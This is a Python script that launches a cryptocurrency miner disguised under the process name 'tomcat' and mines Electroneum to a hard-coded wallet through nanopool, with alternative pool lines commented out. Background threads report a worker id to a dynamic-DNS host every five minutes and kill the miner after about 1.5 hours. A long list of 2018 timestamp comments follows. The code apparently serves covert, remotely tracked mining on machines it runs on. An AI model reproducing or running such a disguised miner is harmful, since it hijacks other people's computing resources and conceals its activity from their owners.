import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:22:04.226781
#2018-02-17 16:08:06.567688
#2018-02-17 17:55:06.646479
#2018-02-17 19:42:04.920315
#2018-02-17 21:31:05.568638
#2018-02-17 23:15:06.373104
#2018-02-18 01:02:04.063867
#2018-02-18 02:50:06.825765
#2018-02-18 04:40:05.891022
#2018-02-18 06:32:02.064510
#2018-02-18 08:20:01.321144
#2018-02-18 10:08:04.769088
#2018-02-18 11:54:03.321756
#2018-02-18 13:39:05.292491
#2018-02-18 15:29:02.091719
#2018-02-18 17:18:03.961748
#2018-02-18 19:07:03.348735
#2018-02-18 20:53:05.544518
#2018-02-18 22:40:08.204783
#2018-02-19 00:29:04.010611
#2018-02-19 02:14:04.062649
#2018-02-19 04:01:04.409583
#2018-02-19 05:45:08.560918
#2018-02-19 07:32:05.988321
#2018-02-19 09:22:07.299054
#2018-02-19 11:11:08.466280
#2018-02-19 12:58:04.552179
#2018-02-19 14:45:09.691844
#2018-02-19 16:33:07.667106
#2018-02-19 18:18:06.198991
#2018-02-19 20:06:05.137123
#2018-02-19 21:54:06.111515
#2018-02-19 23:40:08.930466
#2018-02-20 01:27:07.675643
#2018-02-20 03:17:06.125971
#2018-02-20 05:05:01.875660
#2018-02-20 06:47:07.596079
#2018-02-20 08:34:05.866917
#2018-02-20 10:18:07.954538
#2018-02-20 12:04:01.894838
#2018-02-20 13:51:05.502913
#2018-02-20 15:28:01.660211
#2018-02-20 17:15:07.564960
#2018-02-20 19:06:01.692539
#2018-02-20 20:54:07.646088
#2018-02-20 22:40:07.001401
#2018-02-21 00:22:05.896075
#2018-02-21 02:07:01.235852
#2018-02-21 03:53:06.079615
#2018-02-21 05:40:08.445020
#2018-02-21 07:28:07.725039
#2018-02-21 09:13:05.237794
#2018-02-21 11:02:04.612292
#2018-02-21 12:48:11.070745
#2018-02-21 14:37:06.360946
#2018-02-21 16:23:02.197699
#2018-02-21 18:14:05.766202
#2018-02-21 20:00:11.971569
#2018-02-21 21:48:03.739860
#2018-02-21 23:32:02.116162
#2018-02-22 01:22:02.176739
#2018-02-22 03:10:08.340040
#2018-02-22 04:56:02.100436
#2018-02-22 06:41:05.731092
#2018-02-22 08:29:05.685260
#2018-02-22 10:16:05.524291
#2018-02-22 12:00:01.521999
#2018-02-22 13:46:01.558164
#2018-02-22 15:34:04.380582
#2018-02-22 17:20:07.626020
#2018-02-22 19:06:07.558585
#2018-02-22 20:57:02.156782
#2018-02-22 22:42:04.391970
#2018-02-23 00:29:06.345091
#2018-02-23 02:16:07.549462
#2018-02-23 04:06:01.471260
#2018-02-23 05:53:01.786367
#2018-02-23 07:42:07.501752
#2018-02-23 09:46:02.124601
#2018-02-23 11:52:09.313592
#2018-02-23 13:41:05.211453
#2018-02-23 15:28:09.853522
#2018-02-23 17:18:01.739636
#2018-02-23 19:02:01.363648
#2018-02-23 20:47:09.202202
#2018-02-23 22:37:06.366126
#2018-02-24 00:23:01.996866
#2018-02-24 02:14:05.114214
#2018-02-24 04:03:06.800372
#2018-02-24 05:48:04.820862
#2018-02-24 07:34:01.903535
#2018-02-24 09:20:08.113870
#2018-02-24 11:13:01.820569
#2018-02-24 13:02:05.255415
#2018-02-24 14:49:07.545404
#2018-02-24 16:41:01.362191
#2018-02-24 18:29:02.041825
#2018-02-24 20:15:09.019610
#2018-02-24 22:05:07.914315
#2018-02-25 01:03:05.307438
#2018-02-25 04:34:03.558248
#2018-02-25 08:00:09.276988